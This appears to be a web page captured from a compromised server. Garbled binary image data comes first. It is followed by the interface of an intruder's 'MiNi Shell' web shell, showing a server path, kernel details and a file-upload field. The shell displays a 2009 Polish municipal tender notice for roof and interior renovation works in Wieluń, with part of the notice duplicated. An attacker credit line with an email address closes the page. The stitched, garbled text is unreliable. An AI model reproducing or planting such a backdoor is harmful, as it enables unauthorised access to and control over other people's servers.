JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20090312/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20090312/59522-N-2009.html

<p class="kh_header"><b>Wieluń: Zad.nr 1-Wykonanie remontu pom.wewn.działu transportu w bud.Przedsięb.Komunalnego Zad.nr 2-Wymianapokrycia dachu i wzmocnienie stropu nad parterem w bud.mieszk.przy ul.Długosza 26/28 Zad.nr 3-Remont pokrycia dachu i kominów w bud.mieszk.przy ul.Krak.Przedm.6  Zad.nr 4 -Remont dachu i kominów oraz docieplenie lokali mieszk.na poddaszu w bud.mieszk. przy ul.Długosza 30/32</b><br>
<b>Numer ogłoszenia: 59522 - 2009; data zamieszczenia: 12.03.2009</b><br>
OGŁOSZENIE O ZAMÓWIENIU - roboty budowlane<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Przedsiębiorstwo Komunalne Sp. z o.o. , ul. Zamenhofa 17, 98-300 Wieluń, woj. łódzkie, tel. 043 8433115, faks 043 8434217.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.komunalne.wielun.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Inny: spółka ze 100% udziałem Gminy.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Zad.nr 1-Wykonanie remontu pom.wewn.działu transportu w bud.Przedsięb.Komunalnego Zad.nr 2-Wymianapokrycia dachu i wzmocnienie stropu nad parterem w bud.mieszk.przy ul.Długosza 26/28 Zad.nr 3-Remont pokrycia dachu i kominów w bud.mieszk.przy ul.Krak.Przedm.6  Zad.nr 4 -Remont dachu i kominów oraz docieplenie lokali mieszk.na poddaszu w bud.mieszk. przy ul.Długosza 30/32.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> roboty budowlane.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Zadanie nr 1 -    Wykonanie remontu pomieszczeń wewnętrznych działu transportu w budynku  Przedsiębiorstwa Komunalnego w Wieluniu przy ul.Zamenhofa 17                                   
Zakres robót obejmuje min:
-likwidacja kanału c.o. w budynku - m3  9,98
-wykonanie posadzek z płytek ceramicznych/ z uprzednim przygotowaniem powierzchni/ - m2  102,96
-wymiana skrzydeł drzwiowych-  szt 6
-licowanie ścian płytkami ceramicznymi - m2  21,61
-wymiana muszli ustępowych szt  3
-wymiana umywalek i zlewozmywaka szt  4
-wymiana baterii umywalkowych i zlewozmywakowej szt 4
-wykonanie malowania ścian i sufitów  farbą emulsyjną / z uprzednim przygotowaniem powierzchni gładzie gipsowe/  m2  324,33
-wykonanie tynków wewnętrznych m2   24,67
-wykonanie tynków wewnętrznych na ościeżach o szer.do 40cm   - mb  36,5 
-wykonanie tynków mineralno-żywicznych  m2  13,08
-remont wewn. instalacji c.o./z wymianą grzejników  szt  8 /
-wymiana przyłącza cieplnego w kanale  mb  36
Zadanie nr 2 -    Wymiana pokrycia dachu i wzmocnienie stropu nad parterem w budynku mieszkalnym przy ul.Długosza 26/28

Zakres robót obejmuje min.:
- wymiana pokrycia dachowego z dachówki ceramicznej na blachodachówkę / w kolorze i kształcie dachówki ceramicznej karpiówki/  m2  374
-wymiana ołacenia połaci dachowej m2  374
-wymiana elementów konstrukcyjnych dachu mb 125,78
-przemurowanie kominów ponad dachem z cegły klinkierowej m3  1,14
-obróbki blacharskie z blachy powlekanej m2  50,67
-wymiana rynien dachowych i spustów mb 87,3
-osadzenie okien w połaci dachu szt 2 oraz montaż wyłazu dachowego szt  1
-wykonanie instalacji odgromowej
-wykonanie opaski przy budynku m2  33,6
-remont stropu nad parterem m2  248  ze wzmocnieniem drewnianych belek stropowych mb 111,5
Zadanie nr 2 -    Wymiana pokrycia dachu i wzmocnienie stropu nad parterem w budynku mieszkalnym przy ul.Długosza 26/28

Zakres robót obejmuje min.:
- wymiana pokrycia dachowego z dachówki ceramicznej na blachodachówkę / w kolorze i kształcie dachówki ceramicznej karpiówki/  m2  374
-wymiana ołacenia połaci dachowej m2  374
-wymiana elementów konstrukcyjnych dachu mb 125,78
-przemurowanie kominów ponad dachem z cegły klinkierowej m3  1,14
-obróbki blacharskie z blachy powlekanej m2  50,67
-wymiana rynien dachowych i spustów mb 87,3
-osadzenie okien w połaci dachu szt 2 oraz montaż wyłazu dachowego szt  1
-wykonanie instalacji odgromowej
-wykonanie opaski przy budynku m2  33,6
-remont stropu nad parterem m2  248  ze wzmocnieniem drewnianych belek stropowych mb 111,5

Zadanie nr 3 -   Remont pokrycia dachu i kominów w budynku mieszkalnym przy ul.Krakowskie Przedmieście 6
	
Zakres robót obejmuje min.:
- rozebranie kominów wolnostojących   m3   18,12
-wymurowanie nowych kominów z cegły klinkierowej   m3  6,28
-wykonanie czap z cegły klinkierowej   m3 0,875 
-pomalowanie dachu farbą antykorozyjną z uprzednim przygotowaniem 
 powierzchni m2 340,98
-czyszczenie i reperacja rynien i rur spustowych mb  72,6
-obsadzenie kratek wentylacyjnych  szt 140
-wymiana obróbek blacharskich   m2  11,40
-montaż płotków przeciwśniegowych mb 44,60
Zadanie nr 4 -   Remont dachu i kominów oraz docieplenie lokali mieszkalnych na poddaszu w budynku mieszkalnym przy ul.Długosza  30/32
	
Zakres robót obejmuje min.:
- rozebranie kominów wolnostojących   m3   9,62
-wymurowanie nowych kominów z cegły klinkierowej   m3  8,36
-wykonanie czap z cegły klinkierowej   m3 0,58 
-malowanie antykorozyjne dachu z uprzednim przygotowaniem powierzchni m2  480,46
 -wymiana  obróbek blacharskich   m2  7,32
-obsadzenie kratek wentylacyjnych  szt 64
- malowanie rynien i rur spustowych mb 135,12
-wykonanie docieplenia stropów  poddasza z wełny mineralnej  m2  186,87
-wykonanie docieplenia ścian facjatek i pom.na strychu  /styropian/ m2  87,22.</p>
<p><b>II.1.4) Wspólny Słownik Zamówień (CPV):</b> 45.00.00.00-7.</p>
<p><b>II.1.5) Czy dopuszcza się złożenie oferty częściowej:</b> tak, liczba części: 4.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.1.7) Czy przewiduje się udzielenie zamówień uzupełniających:</b> nie.</p><p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> .</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WARUNKI DOTYCZĄCE ZAMÓWIENIA</b>
<p><b>III.2) WARUNKI UDZIAŁU</b></p>
<ul class="kh_indent_1"><li><b>Opis warunków udziału w postępowaniu oraz opis sposobu dokonywania oceny spełniania tych warunków:</b> 1.Posiadanie uprawnień, wiedzy, doświadczenia, potencjału technicznego
i ekonomicznego do wykonania zadania tj.  spełnienie warunków 
określonych w art. 22. ust. 1 pkt. 1, 2, 3, 4  Prawo zamówień publicznych.

2.Nie podleganie wykluczeniu z postępowania na mocy art. 24  ust. 1 i 2
prawa  zamówień publicznych.

3.Opracowanie oferty ściśle wg załączonego wzoru.

4.Złożenie oświadczenia i dokumentów wskazanych w pkt. XIV niniejszej specyfikacji.

5.Złożenie zamkniętej koperty, zawierającej ofertę z załącznikami, oznaczonej napisem:  Przetarg nr ZP-2-09   Zadanie nr ....      w siedzibie Zamawiającego - Sekretariat  do dnia   07.04.2009 r. do godz. 10.00.
W przypadku braku tej informacji Zamawiający nie ponosi odpowiedzialności za zdarzenia wynikające  z tego braku np. przypadkowe otwarcie  oferty przed  wyznaczonym terminem otwarcia.

6.Wykonanie przedmiotu zamówienia w terminie:  Zadanie nr 1 - 40 dni Zadanie nr  2,3,4  -  5 miesięcy licząc od daty podpisania umowy.

7.Udzielenie gwarancji na wykonane roboty: - Zadanie nr 1- minimum 36 miesięcy   ,    Zadanie nr 2,3,4-   minimum  60  miesięcy.

8.Udokumentowanie wykonania w ciągu ostatnich 5 lat co najmniej jednej
roboty budowlanej o zakresie i charakterze porównywalnym z niniejszym zamówieniem.

9.Posiadanie uprawnień niezbędnych do wykonania przedmiotu zamówienia.

Zamawiający oceni spełnianie warunków udziału w postępowaniu w  zależności od  złożonych dokumentów na zasadzie - spełnia - nie  spełnia  Wykonawca musi wykazać spełnienie każdego z warunków.      
Niespełnienie któregokolwiek warunku spowoduje wykluczenie Wykonawcy      
z postępowania. W/w warunki zostaną spełnione, jeżeli Wykonawca złoży    
dokumenty, o których mowa w punkcie XIV niniejszej specyfikacji..</li>
<li><b>Informacja o oświadczeniach i dokumentach, jakie mają dostarczyć wykonawcy w celu potwierdzenia spełniania warunków udziału w postępowaniu:</b> 1.Oświadczenie w trybie art.22 ust.1 i art.24 ust.1 i 2   Prawa zamówień publicznych  - Zał. Nr 3 specyfikacji.
2.Aktualny odpis z właściwego rejestru albo aktualne zaświadczenie o wpisie do ewidencji działalności gospodarczej - wystawione nie wcześniej niż 6 miesięcy przed upływem terminu składania ofert.
3.Zaświadczenia z właściwego Urzędu Skarbowego oraz właściwego ZUS-u  potwierdzające odpowiednio, że wykonawca nie zalega z opłacaniem podatków, opłat oraz składek na ubezpieczenie zdrowotne lub społeczne lub zaświadczenie, że uzyskał zgodę na zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji organu podatkowego - wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania ofert. 
4.Dokumentami potwierdzającymi spełnienie warunku, o którym mowa                w pkt. VI.8 niniejszej specyfikacji musi być:
a) wykaz robót  Zał. Nr 6 o podobnym zakresie i charakterze z niniejszym  przedmiotem zamówienia zawierający:
-nazwę, adres i telefon Zamawiającego, zakres wykonanych prac, daty rozpoczęcia i zakończenia realizacji robót, wartość brutto robót, nazwa i lokalizacja budowy
-referencje określające, że robota (j.w.) została wykonana z należytą starannością. 
5.Dokumentami potwierdzającymi spełnienie warunku, o którym mowa w punkcie VI.9 niniejszej specyfikacji musi być; -  kserokopia potwierdzona przez wykonawcę za zgodność z oryginałem, uprawnień budowlanych w zakresie odpowiadającym  przedmiotowi  zamówienia oraz:
- zaświadczenie z właściwego Oddziału Izby Inżynierów Budownictwa potwierdzające przynależność wykonawcy do tej Izby na dzień składania ofert.
6.Formularz oferty stanowiący - Zał. Nr 2 specyfikacji.
7.Podpisany projekt umowy - Zał. Nr 5  specyfikacji.
8.Kosztorys ofertowy  (stanowiący kalkulację ceny ryczałtowej) - Zał. Nr 4 specyfikacji.</li></ul>

<p class="kh_title">SEKCJA IV: PROCEDURA</p>

<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>
<br><p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p><p><b>IV.2.2) Wykorzystana będzie aukcja elektroniczna:</b> nie.</p><br><p><b>IV.3) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.3.1)</b>&nbsp;<b>Adres strony internetowej, na której dostępna jest specyfikacja istotnych warunków zamówienia:</b> www.komunalne.wielun.pl.<br><b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Przesiębiorstwo Komunalne spółka z o.o.Wieluń ul.Zamenhofa 17 pokój nr 8 w godz.7.00-15.00.</p>
<p><b>IV.3.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 07.04.2009 godzina 10:00, miejsce: sekretariat Przedsiębiorstwa Komunalnego ul.Zamenhofa 17.</p><p><b>IV.3.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>
<p class="text kh_title">ZAŁĄCZNIK I - INFORMACJE DOTYCZĄCE OFERT CZĘŚCIOWYCH</p>
<p><b>CZĘŚĆ Nr:</b> 1 <b>NAZWA:</b> Wykonanie remontu pomieszczeń wewnętrznych działu transportu w budynku Przedsiębiorstwa Komunalnego w Wieluniu ul.Zamenhofa 17.</p>
<ul class="kh_indent_1"><li><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Zakres robót obejmuje min:
-likwidacja kanału c.o. w budynku - m3  9,98
-wykonanie posadzek z płytek ceramicznych/ z uprzednim przygotowaniem powierzchni/ -    m2  102,96
-wymiana skrzydeł drzwiowych-  szt 6
-licowanie ścian płytkami ceramicznymi - m2  21,61
-wymiana muszli ustępowych szt  3
-wymiana umywalek i zlewozmywaka szt  4
-wymiana baterii umywalkowych i zlewozmywakowej szt 4
-wykonanie malowania ścian i sufitów  farbą emulsyjną / z uprzednim przygotowaniem  powierzchni gładzie gipsowe/  m2  324,33
-wykonanie tynków wewnętrznych m2   24,67
-wykonanie tynków wewnętrznych na ościeżach o szer.do 40cm   - mb  36,5 
-wykonanie tynków mineralno-żywicznych  m2  13,08
-remont wewn. instalacji c.o./z wymianą grzejników  szt  8 /
-wymiana przyłącza cieplnego w kanale  mb  36.</li>
<li><b>2) Wspólny Słownik Zamówień (CPV):</b> 45.00.00.00-7, 45.41.00.00-4, 45.43.10.00-7, 45.44.20.00-7, 45.31.12.00-2, 45.42.11.00-5, 45.33.10.00-6, 45.33.11.00-7, 45.32.00.00-6, 45.23.10.00-5.</li>
<li><b>3) Czas trwania lub termin wykonania:</b> Okres w dniach: 40.</li>
<li><b>4) Kryteria oceny ofert:</b>najniższa cena.</p></ul><br>
<p><b>CZĘŚĆ Nr:</b> 2 <b>NAZWA:</b> Wymiana pokrycia dachu i wzmocnienie stropu nad parterem w budynku mieszkalnym przy ul.Długosza 26/28.</p>
<ul class="kh_indent_1"><li><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Zakres robót obejmuje min.:
- wymiana pokrycia dachowego z dachówki ceramicznej na blachodachówkę / w kolorze i kształcie dachówki ceramicznej karpiówki/  m2  374
-wymiana ołacenia połaci dachowej m2  374
-wymiana elementów konstrukcyjnych dachu mb 125,78
-przemurowanie kominów ponad dachem z cegły klinkierowej m3  1,14
-obróbki blacharskie z blachy powlekanej m2  50,67
-wymiana rynien dachowych i spustów mb 87,3
-osadzenie okien w połaci dachu szt 2 oraz montaż wyłazu dachowego szt  1
-wykonanie instalacji odgromowej
-wykonanie opaski przy budynku m2  33,6
-remont stropu nad parterem m2  248  ze wzmocnieniem drewnianych belek stropowych mb 111,5.</li>
<li><b>2) Wspólny Słownik Zamówień (CPV):</b> 45.00.00.00-7, 45.31.12.00-2, 45.11.12.00-0, 45.26.12.00-6, 45.41.00.00-4, 45.42.10.00-4, 45.45.00.00-6.</li>
<li><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 5.</li>
<li><b>4) Kryteria oceny ofert:</b>najniższa cena.</p></ul><br>
<p><b>CZĘŚĆ Nr:</b> 3 <b>NAZWA:</b> Remont pokrycia dachu i kominów w budynku mieszkalnym przy ul.Krakowskie Przedmieście 6.</p>
<ul class="kh_indent_1"><li><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Zakres robót obejmuje min.:
- rozebranie kominów wolnostojących   m3   18,12
-wymurowanie nowych kominów z cegły klinkierowej   m3  6,28
-wykonanie czap z cegły klinkierowej   m3 0,875 
-pomalowanie dachu farbą antykorozyjną z uprzednim przygotowaniem 
 powierzchni  m2 340,98
-czyszczenie i reperacja rynien i rur spustowych mb  72,6
-obsadzenie kratek wentylacyjnych  szt 140
-wymiana obróbek blacharskich   m2  11,40
-montaż płotków przeciwśniegowych mb 44,60.</li>
<li><b>2) Wspólny Słownik Zamówień (CPV):</b> 45.00.00.00-7, 45.31.00.00-3, 45.26.12.00-6, 45.26.25.00-6.</li>
<li><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 5.</li>
<li><b>4) Kryteria oceny ofert:</b>najniższa cena.</p></ul><br>
<p><b>CZĘŚĆ Nr:</b> 4 <b>NAZWA:</b> Remont dachu i kominów oraz docieplenie lokali mieszkalnych na poddaszu w budynku mieszkalnym przy ul.Długosza 30/32.</p>
<ul class="kh_indent_1"><li><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Zakres robót obejmuje min.:
- rozebranie kominów wolnostojących   m3   9,62
-wymurowanie nowych kominów z cegły klinkierowej   m3  8,36
-wykonanie czap z cegły klinkierowej   m3 0,58 
-malowanie antykorozyjne dachu z uprzednim przygotowaniem powierzchni m2  480,46
 -wymiana  obróbek blacharskich   m2  7,32
-obsadzenie kratek wentylacyjnych  szt 64
- malowanie rynien i rur spustowych mb 135,12
-wykonanie docieplenia stropów  poddasza z wełny mineralnej  m2  186,87
-wykonanie docieplenia ścian facjatek i pom.na strychu  /styropian/ m2  87,22.</li>
<li><b>2) Wspólny Słownik Zamówień (CPV):</b> 45.00.00.00-7, 45.26.12.00-6, 45.26.25.00-6.</li>
<li><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 5.</li>
<li><b>4) Kryteria oceny ofert:</b>najniższa cena.</p></ul><br>

Creat By MiNi SheLL
Email: jattceo@gmail.com